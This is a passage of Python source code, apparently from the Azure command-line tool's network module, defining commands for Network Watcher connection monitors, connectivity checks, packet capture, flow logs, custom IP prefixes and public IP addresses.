test_groups=[test_group],
outputs=outputs,
notes=notes)
return cmv2
def _create_nw_connection_monitor_v2_endpoint(cmd,
name,
endpoint_resource_id=None,
address=None,
filter_type=None,
filter_items=None,
endpoint_type=None,
coverage_level=None):
if (filter_type and not filter_items) or (not filter_type and filter_items):
raise CLIError('usage error: '
'--filter-type and --filter-item for endpoint filter must be present at the same time.')
ConnectionMonitorEndpoint, ConnectionMonitorEndpointFilter = cmd.get_models(
'ConnectionMonitorEndpoint', 'ConnectionMonitorEndpointFilter')
endpoint = ConnectionMonitorEndpoint(name=name,
resource_id=endpoint_resource_id,
address=address,
type=endpoint_type,
coverage_level=coverage_level)
if filter_type and filter_items:
endpoint_filter = ConnectionMonitorEndpointFilter(type=filter_type, items=filter_items)
endpoint.filter = endpoint_filter
return endpoint
def _create_nw_connection_monitor_v2_test_configuration(cmd,
name,
test_frequency,
protocol,
threshold_failed_percent,
threshold_round_trip_time,
preferred_ip_version,
tcp_port=None,
tcp_port_behavior=None,
tcp_disable_trace_route=None,
icmp_disable_trace_route=None,
http_port=None,
http_method=None,
http_path=None,
http_valid_status_codes=None,
http_prefer_https=None,
http_request_headers=None):
(ConnectionMonitorTestConfigurationProtocol,
ConnectionMonitorTestConfiguration, ConnectionMonitorSuccessThreshold) = cmd.get_models(
'ConnectionMonitorTestConfigurationProtocol',
'ConnectionMonitorTestConfiguration', 'ConnectionMonitorSuccessThreshold')
test_config = ConnectionMonitorTestConfiguration(name=name,
test_frequency_sec=test_frequency,
protocol=protocol,
preferred_ip_version=preferred_ip_version)
if threshold_failed_percent or threshold_round_trip_time:
threshold = ConnectionMonitorSuccessThreshold(checks_failed_percent=threshold_failed_percent,
round_trip_time_ms=threshold_round_trip_time)
test_config.success_threshold = threshold
if protocol == ConnectionMonitorTestConfigurationProtocol.tcp:
ConnectionMonitorTcpConfiguration = cmd.get_models('ConnectionMonitorTcpConfiguration')
tcp_config = ConnectionMonitorTcpConfiguration(
port=tcp_port,
destination_port_behavior=tcp_port_behavior,
disable_trace_route=tcp_disable_trace_route
)
test_config.tcp_configuration = tcp_config
elif protocol == ConnectionMonitorTestConfigurationProtocol.icmp:
ConnectionMonitorIcmpConfiguration = cmd.get_models('ConnectionMonitorIcmpConfiguration')
icmp_config = ConnectionMonitorIcmpConfiguration(disable_trace_route=icmp_disable_trace_route)
test_config.icmp_configuration = icmp_config
elif protocol == ConnectionMonitorTestConfigurationProtocol.http:
ConnectionMonitorHttpConfiguration = cmd.get_models('ConnectionMonitorHttpConfiguration')
http_config = ConnectionMonitorHttpConfiguration(
port=http_port,
method=http_method,
path=http_path,
request_headers=http_request_headers,
valid_status_code_ranges=http_valid_status_codes,
prefer_https=http_prefer_https)
test_config.http_configuration = http_config
else:
raise CLIError('Unsupported protocol: "{}" for test configuration'.format(protocol))
return test_config
def _create_nw_connection_monitor_v2_test_group(cmd,
name,
disable,
test_configurations,
source_endpoints,
destination_endpoints):
ConnectionMonitorTestGroup = cmd.get_models('ConnectionMonitorTestGroup')
test_group = ConnectionMonitorTestGroup(name=name,
disable=disable,
test_configurations=[tc.name for tc in test_configurations],
sources=[e.name for e in source_endpoints],
destinations=[e.name for e in destination_endpoints])
return test_group
def _create_nw_connection_monitor_v2_output(cmd,
output_type,
workspace_id=None):
ConnectionMonitorOutput, OutputType = cmd.get_models('ConnectionMonitorOutput', 'OutputType')
output = ConnectionMonitorOutput(type=output_type)
if output_type == OutputType.workspace:
ConnectionMonitorWorkspaceSettings = cmd.get_models('ConnectionMonitorWorkspaceSettings')
workspace = ConnectionMonitorWorkspaceSettings(workspace_resource_id=workspace_id)
output.workspace_settings = workspace
else:
raise CLIError('Unsupported output type: "{}"'.format(output_type))
return output
def add_nw_connection_monitor_v2_endpoint(cmd,
client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name,
coverage_level=None,
endpoint_type=None,
source_test_groups=None,
dest_test_groups=None,
endpoint_resource_id=None,
address=None,
filter_type=None,
filter_items=None,
address_include=None,
address_exclude=None):
(ConnectionMonitorEndpoint, ConnectionMonitorEndpointFilter,
ConnectionMonitorEndpointScope, ConnectionMonitorEndpointScopeItem) = cmd.get_models(
'ConnectionMonitorEndpoint', 'ConnectionMonitorEndpointFilter',
'ConnectionMonitorEndpointScope', 'ConnectionMonitorEndpointScopeItem')
endpoint_scope = ConnectionMonitorEndpointScope(include=[], exclude=[])
for ip in address_include or []:
include_item = ConnectionMonitorEndpointScopeItem(address=ip)
endpoint_scope.include.append(include_item)
for ip in address_exclude or []:
exclude_item = ConnectionMonitorEndpointScopeItem(address=ip)
endpoint_scope.exclude.append(exclude_item)
endpoint = ConnectionMonitorEndpoint(name=name,
resource_id=endpoint_resource_id,
address=address,
type=endpoint_type,
coverage_level=coverage_level,
scope=endpoint_scope if address_include or address_exclude else None)
if filter_type and filter_items:
endpoint_filter = ConnectionMonitorEndpointFilter(type=filter_type, items=filter_items)
endpoint.filter = endpoint_filter
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
connection_monitor.endpoints.append(endpoint)
src_test_groups, dst_test_groups = set(source_test_groups or []), set(dest_test_groups or [])
for test_group in connection_monitor.test_groups:
if test_group.name in src_test_groups:
test_group.sources.append(endpoint.name)
if test_group.name in dst_test_groups:
test_group.destinations.append(endpoint.name)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def remove_nw_connection_monitor_v2_endpoint(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name,
test_groups=None):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
# refresh endpoints
new_endpoints = [endpoint for endpoint in connection_monitor.endpoints if endpoint.name != name]
connection_monitor.endpoints = new_endpoints
# refresh test groups
if test_groups is not None:
temp_test_groups = [t for t in connection_monitor.test_groups if t.name in test_groups]
else:
temp_test_groups = connection_monitor.test_groups
for test_group in temp_test_groups:
if name in test_group.sources:
test_group.sources.remove(name)
if name in test_group.destinations:
test_group.destinations.remove(name)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def show_nw_connection_monitor_v2_endpoint(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
for endpoint in connection_monitor.endpoints:
if endpoint.name == name:
return endpoint
raise CLIError('unknown endpoint: {}'.format(name))
def list_nw_connection_monitor_v2_endpoint(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
return connection_monitor.endpoints
def add_nw_connection_monitor_v2_test_configuration(cmd,
client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name,
protocol,
test_groups,
frequency=None,
threshold_failed_percent=None,
threshold_round_trip_time=None,
preferred_ip_version=None,
tcp_port=None,
tcp_port_behavior=None,
tcp_disable_trace_route=None,
icmp_disable_trace_route=None,
http_port=None,
http_method=None,
http_path=None,
http_valid_status_codes=None,
http_prefer_https=None,
http_request_headers=None):
new_test_config = _create_nw_connection_monitor_v2_test_configuration(cmd,
name,
frequency,
protocol,
threshold_failed_percent,
threshold_round_trip_time,
preferred_ip_version,
tcp_port,
tcp_port_behavior,
tcp_disable_trace_route,
icmp_disable_trace_route,
http_port,
http_method,
http_path,
http_valid_status_codes,
http_prefer_https,
http_request_headers)
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
connection_monitor.test_configurations.append(new_test_config)
for test_group in connection_monitor.test_groups:
if test_group.name in test_groups:
test_group.test_configurations.append(new_test_config.name)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def remove_nw_connection_monitor_v2_test_configuration(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name,
test_groups=None):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
# refresh test configurations
new_test_configurations = [t for t in connection_monitor.test_configurations if t.name != name]
connection_monitor.test_configurations = new_test_configurations
if test_groups is not None:
temp_test_groups = [t for t in connection_monitor.test_groups if t.name in test_groups]
else:
temp_test_groups = connection_monitor.test_groups
# refresh test groups
for test_group in temp_test_groups:
test_group.test_configurations.remove(name)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def show_nw_connection_monitor_v2_test_configuration(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
for test_config in connection_monitor.test_configurations:
if test_config.name == name:
return test_config
raise CLIError('unknown test configuration: {}'.format(name))
def list_nw_connection_monitor_v2_test_configuration(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
return connection_monitor.test_configurations
def add_nw_connection_monitor_v2_test_group(cmd,
client,
connection_monitor_name,
watcher_rg,
watcher_name,
location,
name,
endpoint_source_name,
endpoint_dest_name,
test_config_name,
disable=False,
endpoint_source_resource_id=None,
endpoint_source_address=None,
endpoint_dest_resource_id=None,
endpoint_dest_address=None,
test_config_frequency=None,
test_config_protocol=None,
test_config_preferred_ip_version=None,
test_config_threshold_failed_percent=None,
test_config_threshold_round_trip_time=None,
test_config_tcp_disable_trace_route=None,
test_config_tcp_port=None,
test_config_icmp_disable_trace_route=None,
test_config_http_port=None,
test_config_http_method=None,
test_config_http_path=None,
test_config_http_valid_status_codes=None,
test_config_http_prefer_https=None):
new_test_configuration_creation_requirements = [
test_config_protocol, test_config_preferred_ip_version,
test_config_threshold_failed_percent, test_config_threshold_round_trip_time,
test_config_tcp_disable_trace_route, test_config_tcp_port,
test_config_icmp_disable_trace_route,
test_config_http_port, test_config_http_method,
test_config_http_path, test_config_http_valid_status_codes, test_config_http_prefer_https
]
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
new_test_group = _create_nw_connection_monitor_v2_test_group(cmd,
name,
disable,
[], [], [])
# deal with endpoint
if any([endpoint_source_address, endpoint_source_resource_id]):
src_endpoint = _create_nw_connection_monitor_v2_endpoint(cmd,
endpoint_source_name,
endpoint_source_resource_id,
endpoint_source_address)
connection_monitor.endpoints.append(src_endpoint)
if any([endpoint_dest_address, endpoint_dest_resource_id]):
dst_endpoint = _create_nw_connection_monitor_v2_endpoint(cmd,
endpoint_dest_name,
endpoint_dest_resource_id,
endpoint_dest_address)
connection_monitor.endpoints.append(dst_endpoint)
new_test_group.sources.append(endpoint_source_name)
new_test_group.destinations.append(endpoint_dest_name)
# deal with test configuration
if any(new_test_configuration_creation_requirements):
test_config = _create_nw_connection_monitor_v2_test_configuration(cmd,
test_config_name,
test_config_frequency,
test_config_protocol,
test_config_threshold_failed_percent,
test_config_threshold_round_trip_time,
test_config_preferred_ip_version,
test_config_tcp_port,
test_config_tcp_disable_trace_route,
test_config_icmp_disable_trace_route,
test_config_http_port,
test_config_http_method,
test_config_http_path,
test_config_http_valid_status_codes,
test_config_http_prefer_https)
connection_monitor.test_configurations.append(test_config)
new_test_group.test_configurations.append(test_config_name)
connection_monitor.test_groups.append(new_test_group)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def remove_nw_connection_monitor_v2_test_group(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
new_test_groups, removed_test_group = [], None
for t in connection_monitor.test_groups:
if t.name == name:
removed_test_group = t
else:
new_test_groups.append(t)
if removed_test_group is None:
raise CLIError('test group: "{}" not exist'.format(name))
connection_monitor.test_groups = new_test_groups
# deal with endpoints which are only referenced by this removed test group
removed_endpoints = []
for e in removed_test_group.sources + removed_test_group.destinations:
tmp = [t for t in connection_monitor.test_groups if (e in t.sources or e in t.destinations)]
if not tmp:
removed_endpoints.append(e)
connection_monitor.endpoints = [e for e in connection_monitor.endpoints if e.name not in removed_endpoints]
# deal with test configurations which are only referenced by this remove test group
removed_test_configurations = []
for c in removed_test_group.test_configurations:
tmp = [t for t in connection_monitor.test_groups if c in t.test_configurations]
if not tmp:
removed_test_configurations.append(c)
connection_monitor.test_configurations = [c for c in connection_monitor.test_configurations
if c.name not in removed_test_configurations]
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def show_nw_connection_monitor_v2_test_group(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
for t in connection_monitor.test_groups:
if t.name == name:
return t
raise CLIError('unknown test group: {}'.format(name))
def list_nw_connection_monitor_v2_test_group(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
return connection_monitor.test_groups
def add_nw_connection_monitor_v2_output(cmd,
client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
out_type,
workspace_id=None):
output = _create_nw_connection_monitor_v2_output(cmd, out_type, workspace_id)
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
if connection_monitor.outputs is None:
connection_monitor.outputs = []
connection_monitor.outputs.append(output)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def remove_nw_connection_monitor_v2_output(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
connection_monitor.outputs = []
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def list_nw_connection_monitor_v2_output(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
return connection_monitor.outputs
def show_topology_watcher(cmd, client, resource_group_name, network_watcher_name, target_resource_group_name=None,
target_vnet=None, target_subnet=None): # pylint: disable=unused-argument
TopologyParameters = cmd.get_models('TopologyParameters')
return client.get_topology(
resource_group_name=resource_group_name,
network_watcher_name=network_watcher_name,
parameters=TopologyParameters(
target_resource_group_name=target_resource_group_name,
target_virtual_network=target_vnet,
target_subnet=target_subnet
))
def check_nw_connectivity(cmd, client, watcher_rg, watcher_name, source_resource, source_port=None,
dest_resource=None, dest_port=None, dest_address=None,
resource_group_name=None, protocol=None, method=None, headers=None, valid_status_codes=None):
ConnectivitySource, ConnectivityDestination, ConnectivityParameters, ProtocolConfiguration, HTTPConfiguration = \
cmd.get_models(
'ConnectivitySource', 'ConnectivityDestination', 'ConnectivityParameters', 'ProtocolConfiguration',
'HTTPConfiguration')
params = ConnectivityParameters(
source=ConnectivitySource(resource_id=source_resource, port=source_port),
destination=ConnectivityDestination(resource_id=dest_resource, address=dest_address, port=dest_port),
protocol=protocol
)
if any([method, headers, valid_status_codes]):
params.protocol_configuration = ProtocolConfiguration(http_configuration=HTTPConfiguration(
method=method,
headers=headers,
valid_status_codes=valid_status_codes
))
return client.begin_check_connectivity(watcher_rg, watcher_name, params)
def check_nw_ip_flow(cmd, client, vm, watcher_rg, watcher_name, direction, protocol, local, remote,
resource_group_name=None, nic=None, location=None):
VerificationIPFlowParameters = cmd.get_models('VerificationIPFlowParameters')
try:
local_ip_address, local_port = local.split(':')
remote_ip_address, remote_port = remote.split(':')
except:
raise CLIError("usage error: the format of the '--local' and '--remote' should be like x.x.x.x:port")
if not is_valid_resource_id(vm):
if not resource_group_name:
raise CLIError("usage error: --vm NAME --resource-group NAME | --vm ID")
vm = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Compute', type='virtualMachines', name=vm)
if nic and not is_valid_resource_id(nic):
if not resource_group_name:
raise CLIError("usage error: --nic NAME --resource-group NAME | --nic ID")
nic = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network', type='networkInterfaces', name=nic)
return client.begin_verify_ip_flow(
watcher_rg, watcher_name,
VerificationIPFlowParameters(
target_resource_id=vm, direction=direction, protocol=protocol, local_port=local_port,
remote_port=remote_port, local_ip_address=local_ip_address,
remote_ip_address=remote_ip_address, target_nic_resource_id=nic))
def show_nw_next_hop(cmd, client, resource_group_name, vm, watcher_rg, watcher_name,
source_ip, dest_ip, nic=None, location=None):
NextHopParameters = cmd.get_models('NextHopParameters')
if not is_valid_resource_id(vm):
vm = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Compute', type='virtualMachines', name=vm)
if nic and not is_valid_resource_id(nic):
nic = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network', type='networkInterfaces', name=nic)
return client.begin_get_next_hop(
watcher_rg, watcher_name, NextHopParameters(target_resource_id=vm,
source_ip_address=source_ip,
destination_ip_address=dest_ip,
target_nic_resource_id=nic))
def show_nw_security_view(cmd, client, resource_group_name, vm, watcher_rg, watcher_name, location=None):
if not is_valid_resource_id(vm):
vm = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Compute', type='virtualMachines', name=vm)
security_group_view_parameters = cmd.get_models('SecurityGroupViewParameters')(target_resource_id=vm)
return client.begin_get_vm_security_rules(watcher_rg, watcher_name, security_group_view_parameters)
def create_nw_packet_capture(cmd, client, resource_group_name, capture_name, vm,
watcher_rg, watcher_name, location=None,
storage_account=None, storage_path=None, file_path=None,
capture_size=None, capture_limit=None, time_limit=None, filters=None):
PacketCapture, PacketCaptureStorageLocation = cmd.get_models('PacketCapture', 'PacketCaptureStorageLocation')
storage_settings = PacketCaptureStorageLocation(storage_id=storage_account,
storage_path=storage_path, file_path=file_path)
capture_params = PacketCapture(target=vm, storage_location=storage_settings,
bytes_to_capture_per_packet=capture_size,
total_bytes_per_session=capture_limit, time_limit_in_seconds=time_limit,
filters=filters)
return client.begin_create(watcher_rg, watcher_name, capture_name, capture_params)
def set_nsg_flow_logging(cmd, client, watcher_rg, watcher_name, nsg, storage_account=None,
resource_group_name=None, enabled=None, retention=0, log_format=None, log_version=None,
traffic_analytics_workspace=None, traffic_analytics_interval=None,
traffic_analytics_enabled=None):
from azure.cli.core.commands import LongRunningOperation
flowlog_status_parameters = cmd.get_models('FlowLogStatusParameters')(target_resource_id=nsg)
config = LongRunningOperation(cmd.cli_ctx)(client.begin_get_flow_log_status(watcher_rg,
watcher_name,
flowlog_status_parameters))
try:
if not config.flow_analytics_configuration.network_watcher_flow_analytics_configuration.workspace_id:
config.flow_analytics_configuration = None
except AttributeError:
config.flow_analytics_configuration = None
with cmd.update_context(config) as c:
c.set_param('enabled', enabled if enabled is not None else config.enabled)
c.set_param('storage_id', storage_account or config.storage_id)
if retention is not None:
config.retention_policy = {
'days': retention,
'enabled': int(retention) > 0
}
if cmd.supported_api_version(min_api='2018-10-01') and (log_format or log_version):
config.format = {
'type': log_format,
'version': log_version
}
if cmd.supported_api_version(min_api='2018-10-01') and \
any([traffic_analytics_workspace is not None, traffic_analytics_enabled is not None]):
workspace = None
if traffic_analytics_workspace:
from azure.cli.core.commands.arm import get_arm_resource_by_id
workspace = get_arm_resource_by_id(cmd.cli_ctx, traffic_analytics_workspace)
if not config.flow_analytics_configuration:
# must create whole object
if not workspace:
raise CLIError('usage error (analytics not already configured): --workspace NAME_OR_ID '
'[--enabled {true|false}]')
if traffic_analytics_enabled is None:
traffic_analytics_enabled = True
config.flow_analytics_configuration = {
'network_watcher_flow_analytics_configuration': {
'enabled': traffic_analytics_enabled,
'workspace_id': workspace.properties['customerId'],
'workspace_region': workspace.location,
'workspace_resource_id': traffic_analytics_workspace,
'traffic_analytics_interval': traffic_analytics_interval
}
}
else:
# pylint: disable=line-too-long
with cmd.update_context(config.flow_analytics_configuration.network_watcher_flow_analytics_configuration) as c:
# update object
c.set_param('enabled', traffic_analytics_enabled)
if traffic_analytics_workspace == "":
config.flow_analytics_configuration = None
elif workspace:
c.set_param('workspace_id', workspace.properties['customerId'])
c.set_param('workspace_region', workspace.location)
c.set_param('workspace_resource_id', traffic_analytics_workspace)
c.set_param('traffic_analytics_interval', traffic_analytics_interval)
return client.begin_set_flow_log_configuration(watcher_rg, watcher_name, config)
# combination of resource_group_name and nsg is for old output
# combination of location and flow_log_name is for new output
def show_nsg_flow_logging(cmd, client, watcher_rg, watcher_name, location=None, resource_group_name=None, nsg=None,
flow_log_name=None):
# deprecated approach to show flow log
if nsg is not None:
flowlog_status_parameters = cmd.get_models('FlowLogStatusParameters')(target_resource_id=nsg)
return client.begin_get_flow_log_status(watcher_rg, watcher_name, flowlog_status_parameters)
# new approach to show flow log
from ._client_factory import cf_flow_logs
client = cf_flow_logs(cmd.cli_ctx, None)
return client.get(watcher_rg, watcher_name, flow_log_name)
def create_nw_flow_log(cmd,
client,
location,
watcher_rg,
watcher_name,
flow_log_name,
nsg,
storage_account=None,
resource_group_name=None,
enabled=None,
retention=0,
log_format=None,
log_version=None,
traffic_analytics_workspace=None,
traffic_analytics_interval=60,
traffic_analytics_enabled=None,
tags=None):
FlowLog = cmd.get_models('FlowLog')
flow_log = FlowLog(location=location,
target_resource_id=nsg,
storage_id=storage_account,
enabled=enabled,
tags=tags)
if retention > 0:
RetentionPolicyParameters = cmd.get_models('RetentionPolicyParameters')
retention_policy = RetentionPolicyParameters(days=retention, enabled=(retention > 0))
flow_log.retention_policy = retention_policy
if log_format is not None or log_version is not None:
FlowLogFormatParameters = cmd.get_models('FlowLogFormatParameters')
format_config = FlowLogFormatParameters(type=log_format, version=log_version)
flow_log.format = format_config
if traffic_analytics_workspace is not None:
TrafficAnalyticsProperties, TrafficAnalyticsConfigurationProperties = \
cmd.get_models('TrafficAnalyticsProperties', 'TrafficAnalyticsConfigurationProperties')
from azure.cli.core.commands.arm import get_arm_resource_by_id
workspace = get_arm_resource_by_id(cmd.cli_ctx, traffic_analytics_workspace)
if not workspace:
raise CLIError('Name or ID of workspace is invalid')
traffic_analytics_config = TrafficAnalyticsConfigurationProperties(
enabled=traffic_analytics_enabled,
workspace_id=workspace.properties['customerId'],
workspace_region=workspace.location,
workspace_resource_id=workspace.id,
traffic_analytics_interval=traffic_analytics_interval
)
traffic_analytics = TrafficAnalyticsProperties(
network_watcher_flow_analytics_configuration=traffic_analytics_config
)
flow_log.flow_analytics_configuration = traffic_analytics
return client.begin_create_or_update(watcher_rg, watcher_name, flow_log_name, flow_log)
def update_nw_flow_log_getter(client, watcher_rg, watcher_name, flow_log_name):
return client.get(watcher_rg, watcher_name, flow_log_name)
def update_nw_flow_log_setter(client, watcher_rg, watcher_name, flow_log_name, parameters):
return client.begin_create_or_update(watcher_rg, watcher_name, flow_log_name, parameters)
def update_nw_flow_log(cmd,
instance,
location,
resource_group_name=None, # dummy parameter to let it appear in command
enabled=None,
nsg=None,
storage_account=None,
retention=0,
log_format=None,
log_version=None,
traffic_analytics_workspace=None,
traffic_analytics_interval=60,
traffic_analytics_enabled=None,
tags=None):
with cmd.update_context(instance) as c:
c.set_param('enabled', enabled)
c.set_param('tags', tags)
c.set_param('storage_id', storage_account)
c.set_param('target_resource_id', nsg)
with cmd.update_context(instance.retention_policy) as c:
c.set_param('days', retention)
c.set_param('enabled', retention > 0)
with cmd.update_context(instance.format) as c:
c.set_param('type', log_format)
c.set_param('version', log_version)
if traffic_analytics_workspace is not None:
from azure.cli.core.commands.arm import get_arm_resource_by_id
workspace = get_arm_resource_by_id(cmd.cli_ctx, traffic_analytics_workspace)
if not workspace:
raise CLIError('Name or ID of workspace is invalid')
if instance.flow_analytics_configuration.network_watcher_flow_analytics_configuration is None:
analytics_conf = cmd.get_models('TrafficAnalyticsConfigurationProperties')
instance.flow_analytics_configuration.network_watcher_flow_analytics_configuration = analytics_conf()
with cmd.update_context(
instance.flow_analytics_configuration.network_watcher_flow_analytics_configuration) as c:
c.set_param('enabled', traffic_analytics_enabled)
c.set_param('workspace_id', workspace.properties['customerId'])
c.set_param('workspace_region', workspace.location)
c.set_param('workspace_resource_id', workspace.id)
c.set_param('traffic_analytics_interval', traffic_analytics_interval)
return instance
def list_nw_flow_log(client, watcher_rg, watcher_name, location):
return client.list(watcher_rg, watcher_name)
def delete_nw_flow_log(client, watcher_rg, watcher_name, location, flow_log_name):
return client.begin_delete(watcher_rg, watcher_name, flow_log_name)
def start_nw_troubleshooting(cmd, client, watcher_name, watcher_rg, resource, storage_account,
storage_path, resource_type=None, resource_group_name=None,
no_wait=False):
TroubleshootingParameters = cmd.get_models('TroubleshootingParameters')
params = TroubleshootingParameters(target_resource_id=resource, storage_id=storage_account,
storage_path=storage_path)
return sdk_no_wait(no_wait, client.begin_get_troubleshooting, watcher_rg, watcher_name, params)
def show_nw_troubleshooting_result(cmd, client, watcher_name, watcher_rg, resource, resource_type=None,
resource_group_name=None):
query_troubleshooting_parameters = cmd.get_models('QueryTroubleshootingParameters')(target_resource_id=resource)
return client.begin_get_troubleshooting_result(watcher_rg, watcher_name, query_troubleshooting_parameters)
def run_network_configuration_diagnostic(cmd, client, watcher_rg, watcher_name, resource,
direction=None, protocol=None, source=None, destination=None,
destination_port=None, queries=None,
resource_group_name=None, resource_type=None, parent=None):
NetworkConfigurationDiagnosticParameters, NetworkConfigurationDiagnosticProfile = \
cmd.get_models('NetworkConfigurationDiagnosticParameters', 'NetworkConfigurationDiagnosticProfile')
if not queries:
queries = [NetworkConfigurationDiagnosticProfile(
direction=direction,
protocol=protocol,
source=source,
destination=destination,
destination_port=destination_port
)]
params = NetworkConfigurationDiagnosticParameters(target_resource_id=resource, profiles=queries)
return client.begin_get_network_configuration_diagnostic(watcher_rg, watcher_name, params)
# endregion
# region CustomIpPrefix
def create_custom_ip_prefix(cmd, client, resource_group_name, custom_ip_prefix_name, location=None,
cidr=None, tags=None, zone=None, signed_message=None, authorization_message=None,
custom_ip_prefix_parent=None, no_wait=False):
CustomIpPrefix = cmd.get_models('CustomIpPrefix')
prefix = CustomIpPrefix(
location=location,
cidr=cidr,
zones=zone,
tags=tags,
signed_message=signed_message,
authorization_message=authorization_message
)
if custom_ip_prefix_parent:
try:
prefix.custom_ip_prefix_parent = client.get(resource_group_name, custom_ip_prefix_name)
except ResourceNotFoundError:
raise ResourceNotFoundError("Custom ip prefix parent {} doesn't exist".format(custom_ip_prefix_name))
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, custom_ip_prefix_name, prefix)
def update_custom_ip_prefix(instance,
signed_message=None,
authorization_message=None,
tags=None,
commissioned_state=None):
if tags is not None:
instance.tags = tags
if signed_message is not None:
instance.signed_message = signed_message
if authorization_message is not None:
instance.authorization_message = authorization_message
if commissioned_state is not None:
instance.commissioned_state = commissioned_state[0].upper() + commissioned_state[1:] + 'ing'
return instance
# endregion
# region PublicIPAddresses
def create_public_ip(cmd, resource_group_name, public_ip_address_name, location=None, tags=None,
allocation_method=None, dns_name=None,
idle_timeout=4, reverse_fqdn=None, version=None, sku=None, tier=None, zone=None, ip_tags=None,
public_ip_prefix=None, edge_zone=None, ip_address=None):
IPAllocationMethod, PublicIPAddress, PublicIPAddressDnsSettings, SubResource = cmd.get_models(
'IPAllocationMethod', 'PublicIPAddress', 'PublicIPAddressDnsSettings', 'SubResource')
client = network_client_factory(cmd.cli_ctx).public_ip_addresses
if not allocation_method:
allocation_method = IPAllocationMethod.static.value if (sku and sku.lower() == 'standard') \
else IPAllocationMethod.dynamic.value
public_ip_args = {
'location': location,
'tags': tags,
'public_ip_allocation_method': allocation_method,
'idle_timeout_in_minutes': idle_timeout,
'ip_address': ip_address,
'dns_settings': None
}
if cmd.supported_api_version(min_api='2016-09-01'):
public_ip_args['public_ip_address_version'] = version
if cmd.supported_api_version(min_api='2017-06-01'):
public_ip_args['zones'] = zone
if cmd.supported_api_version(min_api='2017-11-01'):
public_ip_args['ip_tags'] = ip_tags
if cmd.supported_api_version(min_api='2018-07-01') and public_ip_prefix:
public_ip_args['public_ip_prefix'] = SubResource(id=public_ip_prefix)
if sku:
public_ip_args['sku'] = {'name': sku}
if tier:
if not sku:
public_ip_args['sku'] = {'name': 'Basic'}
public_ip_args['sku'].update({'tier': tier})
public_ip = PublicIPAddress(**public_ip_args)
if dns_name or reverse_fqdn:
public_ip.dns_settings = PublicIPAddressDnsSettings(
domain_name_label=dns_name,
reverse_fqdn=reverse_fqdn)
if edge_zone:
public_ip.extended_location = _edge_zone_model(cmd, edge_zone)
return client.begin_create_or_update(resource_group_name, public_ip_address_name, public_ip)
def update_public_ip(cmd, instance, dns_name=None, allocation_method=None, version=None,
idle_timeout=None, reverse_fqdn=None, tags=None, sku=None, ip_tags=None,
public_ip_prefix=None):
if dns_name is not None or reverse_fqdn is not None:
if instance.dns_settings:
if dns_name is not None:
instance.dns_settings.domain_name_label = dns_name
if reverse_fqdn is not None:
instance.dns_settings.reverse_fqdn = reverse_fqdn
else:
PublicIPAddressDnsSettings = cmd.get_models('PublicIPAddressDnsSettings')
instance.dns_settings = PublicIPAddressDnsSettings(domain_name_label=dns_name, fqdn=None,
reverse_fqdn=reverse_fqdn)
if allocation_method is not None:
instance.public_ip_allocation_method = allocation_method
if version is not None:
instance.public_ip_address_version = version
if idle_timeout is not None:
instance.idle_timeout_in_minutes = idle_timeout
if tags is not None:
instance.tags = tags
if sku is not None:
instance.sku.name = sku
if ip_tags:
instance.ip_tags = ip_tags
if public_ip_prefix:
SubResource = cmd.get_models('SubResource')
instance.public_ip_prefix = SubResource(id=public_ip_prefix)
return instance
def create_public_ip_prefix(cmd, client, resource_group_name, public_ip_prefix_name, prefix_length,
version=None, location=None, tags=None, zone=None, edge_zone=None,
custom_ip_prefix_name=None):
PublicIPPrefix, PublicIPPrefixSku = cmd.get_models('PublicIPPrefix', 'PublicIPPrefixSku')
prefix = PublicIPPrefix(
location=location,
prefix_length=prefix_length,
sku=PublicIPPrefixSku(name='Standard'),
tags=tags,
zones=zone
)
